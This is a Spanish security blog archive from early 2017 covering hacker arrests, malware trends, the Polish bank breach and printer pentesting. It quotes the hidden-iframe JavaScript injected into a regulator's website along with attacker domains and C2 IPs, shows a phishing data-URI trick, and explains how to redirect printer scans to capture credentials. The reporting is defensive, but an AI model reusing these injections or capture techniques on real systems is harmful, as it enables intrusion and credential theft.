martes, 14 de febrero de 2017

Cinco delincuentes informáticos arrestados en 2016



Aunque los delincuentes informáticos pueden actuar de muchas formas diferentes, por ejemplo, creando virus, engañando a los usuarios para hacerse con sus datos, vendiendo fallos zero-day a otros delincuentes o robando datos bancarios, por ejemplo, la principal finalidad de todos ellos es conseguir beneficio económico por sus acciones. Debido a la complejidad de la red, además, cada vez es más complicado dar con ellos, aunque debemos recordar que es imposible mantener un anonimato del 100% en la red y, aunque sea complicado, al final el mínimo rastro inapreciable terminará desvelando su identidad y, con ello, causando su detención.

A lo largo de 2016, las fuerzas de seguridad de los distintos países del mundo han detenido a un gran número de delincuentes informáticos de todo el mundo.

Ardit Ferizi, un delincuente informático a favor de ISIS




Ardit Ferizi, aka "Th3Dir3ctory" ("FERIZI") es un ciudadano de Kosovo de 20 años condenado a 20 años de prisión por colaborar con la organización terrorista ISIS. Este delincuente proporcionaba soporte y material a dicho grupo terrorista con el fin de ayudarlos a acceder de forma remota a otros equipos y robar datos personales de otros usuarios, entre otros, los datos de cerca de 1.500 militares estadounidenses y otras personas relevantes del gobierno.

Harold, "el nuevo Snowden"

Harold Thomas Martin III era un contratista de Booz Allen Hamilton para la NSA que, durante todo el tiempo que estuvo trabajando para la organización, logró robar más de 50 TB de datos sensibles de la misma, hasta que finalmente fue detenido a finales de 2016, aunque aún está pendiente de juicio. Entre la información robada por este delincuente informático podemos destacar más de 500 páginas consideradas como "alto secreto".

No se sabe si el ex-contratista consiguió vender la información a la Deep Web, pero en su cartera de Bitcoin tenía más de 300.000 dólares recibidos recientemente.

El príncipe nigeriano Mike

Es muy probable que todos hayamos recibido, tarde o temprano, una donación de miles de dólares por parte de un príncipe nigeriano que, al parecer, es pariente nuestro. Aunque durante muchos años este príncipe ha permanecido en el anonimato, finalmente hemos podido darle nombre, Mike, y edad, 40 años. Este delincuente ha sido acusado de estafar en todo el mundo más de 60 millones de dólares, además de estar relacionado con la distribución de malware y de otras prácticas de fraude online.

Junto a él, las fuerzas de seguridad detuvieron a otro hombre de 38 años con cargos similares, con lo que hemos podido saber que el príncipe Mike no operaba solo.

Paul Biteng, el delincuente informático de COMELEC

En marzo de 2016, un delincuente informático consiguió acceder a los servidores de la Philippine Commission on Elections (COMELEC) y hacer un sencillo deface a dicha página web. Durante la intrusión, los más de 55 millones de votantes filipinos quedaron expuestos y también fueron robados y filtrados, por lo que las fuerzas de seguridad empezaron a investigar el hecho hasta que, finalmente, dieron con el responsable.

El 20 de abril, las fuerzas de seguridad filipinas detenían a un joven de 20 años, Paul Biteng, acusado tanto del deface como del robo de los datos, aunque este delincuente negaba ser responsable del robo y de la publicación de los datos.

Poco más tarde se detenía a un nuevo joven de 23 años, esta vez sí, responsable del robo y la publicación de los datos de los votantes. Ambos aún están a la espera de juicio.

Los hackers que robaron fotografías de Instagram

Por último, también fue detenido en 2016 un grupo de delincuentes de entre 18 y 19 años, cuyos nombres no han sido facilitados, responsables de utilizar técnicas de ingeniería social para conseguir acceder a cuentas de Instagram de un gran número de usuarios, recopilar y publicar sus fotografías personales. Estos jóvenes aún se encuentran a la espera de juicio.

El creador de "xploits .com .ar" arrestado

Como extra, y en el ámbito local, en noviembre la policía argentina arrestó a programador que creaba exploit kits, programas para captar las contraseñas correspondientes a usuarios de distintas aplicaciones y servicios web, ilegalmente.

Fuente: Redes Zone

jueves, 9 de febrero de 2017

Hackean varios bancos en Polonia infectándoles a través de un Organismo Financiero Gubernamental.


Esta semana ha saltado a la primera plana internacional el que ya está considerado como el mayor incidente de Ciberseguridad en la historia de Polonia: varios bancos del país han sido víctimas de un Malware y la fuente de la infección fue la Autoridad de Supervisión Financiera de Polonia (KNF), organismo oficial encargado precisamente de garantizar la seguridad en el sector financiero.

Por el momento se desconoce el número total de bancos afectados aunque se teoriza sobre unas 20 entidades distintas y se ha reportado la infección tanto de estaciones de trabajo como de servidores en varias instituciones bancarias de Polonia. Solamente se ha confirmado la exfiltración de datos e información confidencial y se ha descartado el robo de dinero o manipulación de cuentas bancarias, aunque el tráfico detectado contenía gran cantidad de datos cifrados por lo que es imposible discernir de momento el contenido.

La información es a día de hoy escasa y difusa, ya que está siendo controlada con cuentagotas para mitigar el posible pánico que pudiera desencadenar entre usuarios y clientes. 

El detonante de la investigación fue la detección de tráfico inusual a localizaciones exóticas y el hallazgo de ciertos ejecutables cifrados en servidores de varias entidades, quienes al cotejar los resultados de sus análisis y las IOC dieron la voz de alarma.

Vía de Entrada

Las primeras investigaciones señalan que el punto de partida de la infección fue el servidor web del regulador financiero polaco antes mencionado, KNFwww.knf.gov.pl

Dicha web ha permanecido caída durante los últimos días y hoy durante toda la jornada únicamente ha sido accesible desde Polonia y ha estado bloqueando por geolocalización toda conexión externa.

Mensaje de error en la web del KNF
Bloqueo por geolocalización de la web del KNF: conexión desde fuera y dentro de Polonia
El artículo de BadCyber escrito por varios analistas que han tenido acceso privilegiado a la investigación relata que el código de una librería Javascript de dicho servidor habría sido alterado para cargar un fichero Javascript JSP externo alojado en un servidor remoto, aunque se desconoce cómo se habría logrado en primera instancia dicha modificación inicial.

El código malicioso inyectado estaba localizado en el fichero:
hxxp://www.knf.gov.pl/DefaultDesign/Layouts/KNF2013/resources/accordian-src.js?ver=11
Y consistía en las siguiente líneas:
document.write("<div id='efHpTk' width='0px' height='0px'><iframe 
name='forma' src='hxxps://sap.misapor.ch/vishop/view.jsp?pagenum=1' 
width='145px' height='146px' style='left:-2144px;position:absolute;top:0px;
'></iframe></div>");

Dicho fragmento de Javascript varía de unas versiones a otras en cuanto a la URL y el fichero que carga. A continuación una lista de todos posibles dominios maliciosos encontrados y relacionados con el ataque:
  • sap.misapor.ch 
  • www.eye-watch.in
  • ocmlaptops.co.uk
  • ournepal.com 
  • impacthomes-my.sharepoint.com
  • pharmacareaus-my.sharepoint.com
  • cpsnortherngroup.com 
  • Polakwchinach.pl
Se desconoce el contenido de dichos ficheros Javascript/JSP ya que los recursos parecen no estar disponibles y los servidores devuelven un HTTP 404 o un HTTP 202 con un archivo sin contenido. 
Se cree firmemente que descargaba un fichero en el equipo de la víctima el cual al ser ejecutado realizaba conexiones con varios servidores controlados por los atacantes permitiéndoles funcionalidades como tomar el control del equipo y propagarse por la red interna.

Servidor C&C

En los logs analizados de equipos infectados se han detectado conexiones a dos IPs distintas:
  • 125.214.195.17
  • 196.29.166.218
Detrás de una de esas IPs parece haber un servidor en Sudán bastante abierto:



Fuente de las imágenes: https://twitter.com/v0id_hunter/status/828693925057675265

Malware
Aun no está clara la autoría de estos ataques, pero los análisis forenses pertinentes dejan entrever que el problema se remonta a mediados de 2016, lo que significa que los bancos han sido víctimas del espionaje durante más de 6 meses.
El malware utilizado en Polonia usa packers comerciales y múltiple ofuscadores, recurre al cifrado de ficheros y tráfico, y en el momento de los análisis ningún Antivirus era capaz de detectarlo. El payload final tenía las funcionalidades de un RAT común.

Ciertos analistas destacan como posible candidato a relacionar con dicho malware a una APT bautizada como "Bluenoroff" que fue detectada en 2016 y cuya incidencia se ha disparado en los últimos meses. 
El siguiente informe de Telefónica del pasado noviembre habla sobre dicha APT basándose en análisis realizados por Karspersky sobre una muestra obtenida de un ataque al Banco de Indonesia. Según el citado documento, "Bluenoroff" fue el malware utilizado en los ataques contra el sistema SWIFT en Bangladesh, Indonesia, India y otros países del sudeste asiático, y presenta similitudes con otro usado previamente en ataques contra bancos en Vietnam.

A la espera de nuevos avances en las investigaciones, de momento sólo se han compartido los hashes de algunas de las muestras analizadas:


MD5
C1364BBF63B3617B25B58209E4529D8C
85D316590EDFB4212049C4490DB08C4B
1BFBC0C9E0D9CEB5C3F4F6CED6BCFEAE


SHA1 
496207DB444203A6A9C02A32AFF28D563999736C
4F0D7A33D23D53C0EB8B34D102CDD660FC5323A2
BEDCEAFA2109139C793CB158CEC9FA48F980FF2B
SHA256 
FC8607C155617E09D540C5030EABAD9A9512F656F16B38682FD50B2007583E9B
D4616F9706403A0D5A2F9A8726230A4693E4C95C58DF5C753CCC684F1D3542E2
CC6A731E9DAFF84BAE4214603E1C3BAD8D6735B0CBB2A0EC1635B36E6A38CB3A


Fuentes:
https://zaufanatrzeciastrona.pl/post/wlamania-do-kilku-bankow-skutkiem-powaznego-ataku-na-polski-sektor-finansowy/
https://badcyber.com/several-polish-banks-hacked-information-stolen-by-unknown-attackers/
https://twitter.com/v0id_hunter/status/828693925057675265
http://thehackernews.com/2017/02/bank-hacking-malware.html

miércoles, 8 de febrero de 2017

Cómo dieron de baja el 20% de la Dark Web


Hace unos días un hacker consiguió cerrar más de alrededor del 20% de las páginas web que existen en la actualidad en la Dark Web, todas ellas alojadas en los servidores de una empresa llamada Freedom Hosting II. Los visitantes que intentaban acceder a esas páginas web recibían un mensaje diciendo "Hola, Freedom Hosting II: habéis sido hackeados".

Freedom Hosting ya tuvo problemas con las autoridades

Es probable que alguno de vosotros recuerde el nombre de Freedom Hosting. El pasado mes de noviembre recogíamos que el FBI había infectado con malware ese servicio de alojamiento web con el objetivo de hackear 23 páginas web, entre las que se encontraba TorMail. Ese servicio web era utilizado, entre otros, por cuentas de usuario que compartían contenido de pornografía infantil. Ese es el motivo por el que el hacker ha bloqueado el acceso a las páginas web de Freedom Hosting II, ya que la esta segunda versión seguía alojando este tipo de contenido.

El hacker consiguió acceder al servicio el pasado 30 de enero, pero sólo tenía permisos de lectura. Sólo podía ver las páginas web que estaban alojadas en el servicio, pero no podía cambiar ni eliminar ningún archivo. En un principio sólo quiso ver qué contenido había alojado por pura curiosidad. El problema es que encontró varias páginas web que alojaban pornografía infantil.

Sólo 21 pasos para hackear al servicio de la Dark Web

El hecho es que Freedom Hosting II sólo permitía 256 MB de almacenamiento gratuito. Las páginas web ilegales que descubrió el hacker llegaban a ocupar hasta 30 GB, por lo que las páginas pagaban por el alojamiento. De ahí, el hacker dedujo que el dueño de Freedom Hosting II tenía que saber qué tipo de contenido se estaba alojando en sus servicios, por lo que procedió a cerrarles el servicio. En total, el hacker descubrió al menos 10 páginas web de este tipo.



El proceso que siguió se divide en 21 pasos. En resumen, el proceso se inicia creando una nueva página web alojada en Freedom Hosting II o logueándose en una antigua. Luego se hacen unos cuantos cambios en el archivo de configuración, se solicita un cambio de contraseña en la página web objetivo, se consigue acceso root, y finalmente se accede al sistema con privilegios de administrador.

Antes de borrar todos los datos, el hacker hizo una copia de seguridad de los mismos y los hizo públicos, aunque eliminando los datos de los usuarios. Estos datos sólo estarán presentes en los archivos que envíen a investigadores de seguridad, que a su vez enviarán a las autoridades para realizar las debidas detenciones. La mitad de la información obtenida, según afirman, era pornografía infantil. Entre las otras páginas web se encontraban algunas de escrow con Bitcoins, estafas que siguen el esquema Ponzi y foros de hackeo. En total, fueron 10.613 webs cuyos nombres concretos están recopilados en esta lista.

El grupo de hackers que ha dicho estar relacionado con Anonymous ha acabado con estas páginas web de dominio .onion accesibles sólo a través de Tor. Por desgracia, es probable que surja posteriormente un Freedom Hosting III, ya que es el procedimiento natural en este tipo de casos. En Internet, cuando se cierra una web, se abre otra.

martes, 7 de febrero de 2017

Tendencias de malware. Enero 2017

Un mes más, desde el laboratorio de malware de S2 Grupo, queremos compartir con vosotros lo que se está cociendo en el mundo del malware. Recordad que en este tipo de entradas encontraremos amenazas conocidas, vistas en otras fuentes o analizadas directamente en nuestro laboratorio, pero el objetivo del post es conocer qué tipo de amenazas están activas.
A continuación mostramos un diagrama con la información recopilada este mes desde el laboratorio:

Empezamos con una amenaza que no está muy elaborada, pero que nos gustaría nombrar puesto que está en perfecto castellano y no es algo muy común en ataques genéricos dirigidos a España ya que generalmente utilizan traductores o tienen fallos bastante llamativos. Esta amenaza es un phishing que ha estado llegando por correo electrónico y en algunos casos venía adjunto un fichero HTML y en otros casos un PDF.
En el primero de los casos, el fichero HTML adjunto utiliza la etiqueta “<meta>” para redirigir a una web clonada de GoogleDrive. Para ello, usan un método muy utilizado últimamente con fines maliciosos que consiste en cargar desde la barra de direcciones del navegador, una web codificada en Base64 dentro de la misma URL de la siguiente manera:
data:text/html;base64,[CódigoHTMLenBase64]
Por ejemplo:
data:text/html;base64,PEhUTUw+DQo8Ym9keSBvbmxvYWQ9ImFsZXJ0KCdOb3NvdHJvcyBzb21vcyBidWVub3MsIHBlcm8gZGViZXImaWFjdXRlO2FzIGhhYmVybG8gZGVjb2RpZmljYWRvIGFudGVzIGRlIHByb2JhcmxvIDopICcpIj4NCjwvYm9keT4NCjwvSFRNTD4=
En el otro caso que comentábamos, viene adjunto un PDF como el siguiente:
En este caso, al dar click en el botón el PDF nos manda a una web clonada, utilizando el mimo método, que nos muestra el siguiente contenido:
Si iniciamos sesión en esta página nos envía a la dirección: http://wordpressplugis.com/Eyor/results7.php con nuestros datos incluidos en la url de la siguiente forma:
country=Gmail&email=fakemail%40gmail.com&addresszip=passwordfake&mobile=666666666
Nos llama la atención que los nombres de los parámetros no coinciden con su contenido y el hecho de que el fichero PHP se llame results7.php. Puede que los nombres de los parámetros sean esos para evitar llamar la atención de NIDS con cadenas como “Password=” aunque también podría tratarse de código reutilizado de cualquier tutorial al que le han tenido que dedicar siete intentos para conseguir que funcione…
Otro caso interesante ha sido el del ransomware Spora, el cual también tiene capacidades de gusano lo que significa que aparte de cifrar todos tus ficheros, se copia a sí mismo en las memorias USB y discos conectados al host infectado para expandirse a otros sistemas en los que se conecte el dispositivo en cuestión posteriormente. Esto no es algo nuevo pero desde que se empezaron a bloquear los ficheros “autorun.inf” se ha complicado un poco para los bichos realizar estos saltos entre ordenadores. Este malware utiliza una técnica bastante curiosa que se basa en el sistema comentado en este post anterior. Sustituye todas las carpetas y ficheros por accesos directos con el mismo icono y nombre, pero que realizan funciones extra a partir del método comentado en ese post anterior. Y para que quede más limpio, eliminan la característica “flechita” blanca de los accesos directos (ejemplo de acceso directo) que se puede observar en la esquina inferior izquierda de los accesos directos eliminando la entrada de registro “HKCR\lnkfile\isShortcut” dejando como resultado algo como esto:
Otro caso a remarcar es el hecho de la aparición de malware bancario para Android, el cual empieza por rootear el dispositivo para tener control total del mismo y quedarse esperando a que accedas a una aplicación bancaria para superponer una interfaz de acceso falsa. De esta forma pueden llegar a robar tus datos, tener la capacidad de capturar los SMS y eliminarlos del dispositivo, de forma que podrían llegar a realizar operaciones libremente.
El caso es que este último, conocido como “Bankbot”, se basa en el código de uno más antiguo que ha sido liberado por foros relativos a malware, por lo que es probable que esta sea la primera de muchas variantes, ya que esto les da la mayor parte del trabajo hecho a los malos de forma relativamente fácil.
Por último, nos gustaría repasar la actividad reciente de los dos ExploitKits(EK) con más actividad durante este mes. Estos han sido RIG, su versión E (Empire Pack) y su versión “Premium” V y Sundown.
El grupo que está detrás de las infecciones a través de RIG-V ha seguido centrado en el Ransomware, pero ha aumentado la variedad de su arsenal, pues hemos visto entre otros el ya común Cerber, y otros como nuestro viejo amigo Locky, CryptoMix y el que repasábamos más arriba, Spora.
En cuanto al EK RIG-E han estado especialmente centrados en el troyano bancario GootKit.
Y por último, Sundown se ha sumado al reparto de Cerber junto con otro malware catalogado como Terdot.A-Zloader (una variante del troyano bancario Zeus cuyo código fue liberado alrededor de 2011).
Como siempre desde el laboratorio de malware esperamos que les sea de utilidad esta información.

lunes, 6 de febrero de 2017

Printesting: la seguridad de las impresoras también importa

Dentro de las redes corporativas, las impresoras y dispositivos multifunción a menudo son dejadas de lado cuando se habla de seguridad.
En muchas ocasiones, estos dispositivos pueden ser aprovechados por un insider o atacante para acceder a información confidencial que ha sido previamente escaneada, obtener listados de correos electrónicos e incluso llegar a obtener credenciales de usuarios.
En este post vamos a ver algunas pruebas de concepto identificadas durante diversos test de intrusión. A continuación vemos un dispositivo multifunción el cual no dispone de credenciales para acceder al portal web, si no ha sido configurado previamente.
Esto permitiría a cualquier persona que se encuentre en la red corporativa y tenga visibilidad sobre este activo, acceder a toda la información que ha sido escaneada.

Obviamente no os voy a enseñar la información que se obtuvo de este dispositivo, pero os prometo que era bastante “jugosa”.
Además, analizando los nombres de los documentos impresos o escaneados, o en el caso de que se puedan obtener, se puede conocer la ubicación exacta de la impresora incluso el departamento o departamentos que hacen uso de ella. En este sentido, a nivel de privilegios en la red, un atacante tendría mayor interés en aquellas que use el departamento de informática, o bien, a nivel de información sensible podrían interesar aquellas impresoras usadas por departamentos financieros o de dirección, entre otros.
Dejando la información que ha sido escaneada de lado, pasamos a aprovechar otro dispositivo multifunción para obtener credenciales cifrados (hashes) de usuario.
Para ello aprovecharemos la funcionalidad de escanear una carpeta de red, esta función permite al usuario que todo lo que escanee se guarde directamente en la ubicación configurada (su equipo o algún servidor de ficheros). Por regla general, para acceder a carpetas compartidas se suelen configuran que solo se puede acceder con credenciales. Esto implica que dichos son almacenados de alguna forma en el dispositivo, por lo que teóricamente sería posible acceder.
Es este caso un atacante tendría que realizar un cambio en la configuración de la impresora. Sorprendentemente para realizar este cambio no se requieren privilegios.
En la siguiente ilustración vemos cómo aprovechar esta vulnerabilidad. Lo primero que hacemos es cambiar la ruta de donde se guardan los archivos que han sido escaneados, por una dirección IP bajo nuestro control. De esta forma, al probar la función de escanear, las credenciales cifradas del usuario que se encuentre configurado son enviadas a nuestro equipo.
Para recibir los hashes solo nos hace falta algún tipo de listener SMB. Al final recibimos un hash de tipo NTLMv2 como este.
Llegados a este punto, solo tenemos que realizar un ataque de fuerza bruta o de diccionario para obtener la contraseña, por lo que dependerá de la buena o mala política de contraseñas o el grado de concienciación en seguridad del usuario
En el peor de los casos, según el fabricante y el modelo de impresora, no existe un botón para comprobar la validez de credenciales introducidos. De este modo, mediante acceso físico al dispositivo, se elige el usuario modificado de la libreta de direcciones y se realiza un escaneo; o bien cabe esperar a que el propio usuario realice la operación por sí mismo, aunque se daría cuenta de que el escaneo “ha fallado”.
Si creíais que eso era todo, estabais muy equivocados. ¿Que nada mejor que credenciales en texto plano?
La única pega de este POC es que tuvimos que acceder con los credenciales por defecto :D.
Para la obtención de las credenciales en claro solo tiene que cambiar el método de autenticación de la impresora de SMB por FTP y suplantar la dirección del servidor de ficheros, tal como hicimos anteriormente.
A partir de aquí, con un listener que capture la contraseña o bien analizando los paquetes de red recibidos, se obtendría la contraseña en claro.
Destacar que muchas de las contraseñas obtenidas utilizando estos vectores de ataque fueron aprovechadas como punto de entrada para acceder y tomar el control de diversos activos y su información.
Estas credenciales pueden ser, por un lado las nominales de los usuarios del directorio activo, o bien credenciales genéricas que se usan con el objetivo único de acceder a los recursos donde se depositan los documentos escaneados.
En este punto, dependiendo de los privilegios que tenga la cuenta de usuario comprometida, el impacto de explotar esta vulnerabilidad sería muchísimo mayor.
Cómo veis no se trata de emplear ninguna técnica avanzada de exploiting sobre el firmware o los servicios que exponen estas impresoras. Se trata de analizar cómo seríamos capaces de abusar de configuraciones no seguras sobre las capacidades que ofrecen.
Recomendaciones:
  • La primera y fundamental es modificar la contraseña de acceso a la interfaz web de la impresora por una lo suficientemente segura.
  • Además, es altamente recomendable que los usuarios configurados no dispongan de privilegios en la red corporativa, ya que el uso de estos quedaría expuesto a la seguridad que ofrezca el propio dispositivo.
  • En el caso de que la impresora vaya a ser usada por personas con cuentas con ciertos privilegios o que manejen información sensible, se recomienda hacer un estudio a la hora de elegir qué tipo de impresoras ofrecen mecanismos de protección adecuados. Incluso analizar la posibilidad de trasladar estas impresoras a otras redes aisladas con un mayor control tanto de los accesos a las interfaces de gestión como de la actividad que se genera a su entorno.
  • De forma general, se recomienda implantar controles de seguridad que permitan monitorizar el uso de las cuentas y además los accesos privilegiados a estos dispositivos.
Fuente:

jueves, 2 de febrero de 2017

Buscar vulnerabilidades de seguridad relacionadas con el funcionamiento de aplicaciones de Android.

QARK (Quick Android Review Kit) es una herramienta que está diseñada para buscar varias vulnerabilidades de seguridad relacionadas con el funcionamiento de aplicaciones de Android, ya sea en código fuente o en archivos empaquetados en APKs. Con la particularidad de que esta herramienta también es capaz de crear APKs desplegables como prueba de concepto o comandos ADB, capaces de explotar muchas de las vulnerabilidades que encuentran en Android. No es necesario tener privilegios de root el dispositivo de prueba, ya que esta herramienta se centra en vulnerabilidades que pueden ser explotadas bajo condiciones de un usuario común.



QARK es una herramienta fácil de usar, capaz de encontrar vulnerabilidades de seguridad comunes en las aplicaciones de Android. A diferencia de los productos comerciales, es 100% libre bajo las condiciones de la licencia Apache versión 2.0. QARK también ofrece información educativa que permite a los que están dando sus primeros pasos en el análisis de seguridad en Android localizar explicaciones precisas y en profundidad de las vulnerabilidades. QARK automatiza el uso de decompiladores múltiples, aprovechando sus salidas combinadas, para producir resultados mas precisos, al decompilar APKs. Por último, la mayor ventaja que tiene QARK sobre las herramientas tradicionales, es que no sólo apuntan a posibles vulnerabilidades, si no, que puede producir comandos ADB, o incluso APKs totalmente funcionales, que convierten las hipotéticas vulnerabilidades en explotaciones operativas "POC".
Los tipos de vulnerabilidades de seguridad que esta herramienta intenta encontrar son:

  • Componentes exportados de forma inadvertida.
  • Componentes exportados protegidos incorrectamente.
  • Intentos que son vulnerables a la interpretación o escucha indebida.
  • Validación incorrecta del certificado x.509.
  • Creación de archivos legibles con permisos de lectura, escritura y ejecución, para todos.
  • Actividades que pueden producir fugas de datos..
  • El uso de mensajes “Sticky Intents”.
  • Uso de teclas privadas incrustadas en el codigo fuente.
  • Uso de criptografía débil o inadecuado.
  • Configuraciones de navegadores web potencialmente explotables.
  • Actividades de preferencia exportables.
  • Tapjacking.
  • Aplicaciones que permiten copias de seguridad.
  • Aplicaciones que son depurables.
  • Aplicaciones compatibles con versiones de API caducadas, con vulnerabilidades conocidas.

Más información y descarga de QARK:
https://github.com/linkedin/qark
Herramientas para el análisis de aplicaciones maliciosas en Android:
http://www.gurudelainformatica.es/2016/12/herramientas-para-el-analisis-de.htmlPlataforma para análisis de malware, pruebas de penetración e ingeniería inversa, de Android:
http://www.gurudelainformatica.es/2017/01/plataforma-para-analisis-de-malware.html
x

martes, 31 de enero de 2017

¿Como esta conformado el departamento de seguridad informática en una empresa?



La seguridad informática en una empresa es sumamente importante, pues de ella depende el buen resguardo de sus equipos, pero también, de la información que manejen. Si bien es cierto que mientras más grande es la empresa, más debe enfocarse en esta área, también es cierto que así sea una pequeña, debe tomar unas medidas mínimas en esta área.

Toda empresa debe tener un departamento encargado de la seguridad informática, el mismo debe tener un liderazgo claro, una normativa bien específica, bajo la cual se deben regir todos los procedimientos, pero además un ente encargado de las operaciones, otro de la supervisión y uno más del desarrollo.



Este tipo de estructura se encuentra en las empresas más grandes, en las más chicas, las labores se van dividiendo entre los integrantes, de eso saben los que están comenzando un emprendimiento, pero a la vez que va creciendo este, se va haciendo necesaria una mejor estructura.

Aunque todas las partes del departamento de seguridad informática son importantes, no todas están presentes en todas las empresas. Un ejemplo de estas es el área de desarrollo, en esta área se desarrollan, valga la redundancia, las herramientas relacionadas con el control de seguridad, librerías y todo lo relacionado son el software. Por lo general, en esta área encontramos a personas especializadas en esta materia, motivo por el cual no se encuentra en emprendimientos que están iniciándose.

En lo que respecta al área de supervisión y al de operaciones, siempre están presentes. En el primero se verifica que se cumplan todas las normativas y leyes establecidas, y en el segundo es donde se llevan a cabo todas las actividades necesarias para lograr los objetivos establecidos por el líder del departamento de seguridad informática.



Esta es una explicación a groso modo de cómo está formado el departamento de seguridad informática en una empresa.

Lo más importante es tener presente cuales son las normativas que se deben respetar, pero también contar con el personal adecuado para resguardar los intereses de nuestra empresa, y recordar que mientras más sensible sea el área donde nos desempeñemos y la información que manejemos, mayor será la inversión que debe darse en este tópico.

Fuente:

lunes, 30 de enero de 2017

Cómo comprobar que nos están robando nuestro internet


Más de una vez hemos escuchado la frase “Creo que me están robando el internet”, y es que dependiendo de las configuraciones que se han aplicado en nuestro router es probable que alguien haya logrado acceder a tu red wifi y esté haciendo uso ilegítimo de nuestra conexión a internet.

Hoy en día incluso hay personas inescrupulosas que ofrecen el servicio de “Internet gratis por 20 dls ” mediante panfletos colocados en paradas de autobús y locutorios. Si te preguntas el por qué nadie los denuncia, la respuesta será simple: puede llegar a tomar un tiempo considerable encontrar la ubicación exacta de la persona que está usando nuestra conexión de internet y más tiempo aún encontrar a quien ha hecho este “trabajo”.
¿Cuáles son los síntomas?

Algunos de los síntomas que pueden hacer saltar las alertas de que esto esté sucediendo son los siguientes:
Los vídeos que reproducimos en internet empiezan a truncarse repentinamente.
Las páginas de internet tardan demasiado en cargarse en nuestro navegador.
El problema se presenta en los mismos horarios.
Todo pasa desde que hay un nuevo vecino en el edificio.

Hay que recordar que aunque se presenten todos los síntomas mencionados, no necesariamente podemos llegar a la conclusión de que alguien ha entrado a nuestra red.
¿Cómo comprobamos cuántos equipos están en mi red?

Existen muchas herramientas libres que nos podrían ayudar a conocer cuántos equipos están conectados a nuestras red, una de las mejores y más usadas es “Angry IP scan” que identifica la dirección IP de los equipos que se hallan conectados a nuestra red. Veamos cómo usar esta herramienta:
Obtén el programa desde este enlace de descarga.
Abre la carpeta donde generalmente se descargan tus documentos y ejecuta el programa haciendo doble clic sobre él. Es posible que aparezca una ventana consultando si queremos Ejecutar o Cancelar la aplicación.




Tras unos pocos segundos la ventana del programa se abrirá automáticamente y detectará los parámetros necesarios para empezar a trabajar. Bastará con hacer clic sobre la opción Comenzar para que Angry IP scan empiece a realizar la búsqueda de las IPs de todos los equipos conectados a tu red.




Al final de la búsqueda Angry IP scan mostrará el resultado de lo que ha encontrado. Todos los equipos se hayan encontrado se mostrarán con un pequeño círculo de color azul seguidos de su dirección IP y el tiempo que ha tardado en encontrarlos.




Ahora lo que nos queda por hacer es contar cuántos ordenadores y equipos tenemos en casa y verificar si la cuenta coincide con las IPs de equipos que ha encontrado Angry IPscan. (Debemos recordar que nuestro router cuenta como un equipo más). Si nuestra red está bien las cuentas deben coincidir, pero si la cantidad de equipos que ha encontrado nuestro programa es mayor que el total de dispositivos que tenemos en casa alguien se ha colado en nuestra red.
¿Qué hacemos si encontramos infiltrados en nuestra red?

Si hemos comprobado que alguien no autorizado está dentro de nuestra red, deberíamos realizar las siguientes tareas:
Cambiar la contraseña de acceso a tu wifi inmediatamente.
Verificar que el tipo de seguridad usado para nuestra contraseña wifi sea WAP o WAP2.
Como medida adicional es recomendable cambiar la contraseña de acceso a la configuración de tu router.

viernes, 27 de enero de 2017

¿Qué tipo de antivirus debería escoger?



¿Qué tipo de antivirus debería escoger?

La diferencia entre software de seguridad "gratuito", "premium" y "predeterminado".


Existen tres tipos principales diferentes de soluciones antivirus disponibles para usuarios de PC: gratuito, premium y predeterminado del sistema operativo. La siguiente información te ayudará a escoger la solución correcta para tu equipo.

Cuando se trata de proteger la PC y los datos personales, deseamos obtener la mejor protección disponible. Sin embargo, las opciones disponibles pueden confundirte: ¿la protección antivirus gratuita es tan buena como el paquete de seguridad de pago? ¿El programa predeterminado de la PC es tan bueno como el de otra empresa? Permítenos disipar las dudas:
Gratuito

El antivirus gratuito puede ser extraordinariamente bueno. De hecho, el antivirus «gratuito» siempre supera a las soluciones de pago en las pruebas de terceros. Eso se debe a que las empresas que se toman la seguridad en serio no se pueden permitir lanzar un producto que sólo funcione a medias. Además, algunos proveedores de antivirus gratuitos, como Avast, utilizan el mismo motor antivirus en todos los productos fundamentales de seguridad para PC. Ofrecemos a los usuarios de software gratuito y premium la misma protección fundamental y básica contra malware.

La solución gratuita, Avast Free Antivirus, se envía siempre a organizaciones independientes de prueba para la testeen. En la prueba más reciente de AV-Test, Avast recibió una puntuación máxima de 6 en el Informe de certificación y revisión de producto de AV-Test. Esto significa que los usuarios de Avast reciben una protección del 100 % contra amenazas de día cero y del 99,80% contra malware. No todas las soluciones gratuitas obtienen esta calificación. Depende de la empresa de seguridad, de manera que te recomendamos que revises estas pruebas y juzgues por ti mismo cuáles son las que funcionan.
Premium

¿Entonces, qué se obtiene cuando pasamos de una solución gratuita a una premium? Las versiones premium de los antivirus incluyen características adicionales que las versiones gratuitas no tienen. Las versiones premium son para personas que desean la cobertura más exhaustiva. El mundo está cambiando y las amenazas siguen apareciendo de nuevas maneras. A menudo, las características premium nuevas abordan estas vulnerabilidades.

Las siguientes son algunas de nuestras características premium: Firewall, Anti-Spam, Data Shredder y una función que impide que los atacantes cambien los DNS de la PC. Muchos riesgos de seguridad se producen por el comportamiento. Por ejemplo, si no cambias la contraseña, la seguridad de las cuentas se ve debilitada. La mayoría de las personas eligen una solución premium, ya que les da la tranquilidad de que cuentan con la cobertura más completa disponible cuando realizan una compra a una empresa prestigiosa.
Predeterminado

El software de seguridad predeterminado es la solución disponible por defecto cuando compra el sistema operativo, como Windows. Windows Defender es uno de esos productos predeterminados y el más disponible. Este tipo de software presenta la desventaja de ser una solución de seguridad proveniente de una empresa como Microsoft, mejor conocida por el software de procesador de textos y los sistemas operativos. Defender se presentó en 2006, y se le agregó protección antivirus con el lanzamiento de Windows 8. Tuvo una década para aumentar el rendimiento, pero siempre funciona mal en las pruebas de terceros.

De hecho, Windows Defender fue el producto antivirus menos efectivo de un campo de 21 productos de seguridad para usuarios domésticos en las Pruebas del mundo real de AV-Test. Windows Defender sólo recibió una puntuación del 89,9 % en protección contra ataques de malware de día cero (que, según el Instituto AV-TEST, representa el nivel mínimo de protección) y detectó 9 falsos positivos. El promedio de la industria para la protección contra ataques de día cero fue del 98 %.

Otro factor a tener en cuenta es el impacto del antivirus en el rendimiento del sistema. No deseas utilizar una aplicación que se apropie del microprocesador de la PC y la ralentice. Desafortunadamente, el software predeterminado de Windows 10 tiene un impacto significativo en el rendimiento del sistema en comparación con las marcas de software de seguridad gratuitas o premium. En el siguiente gráfico puedes ver que Windows Defender obtuvo una puntuación de 20 puntos de diferencia en comparación con soluciones gratuitas como Avast, que se colocó entre los cinco primeros.



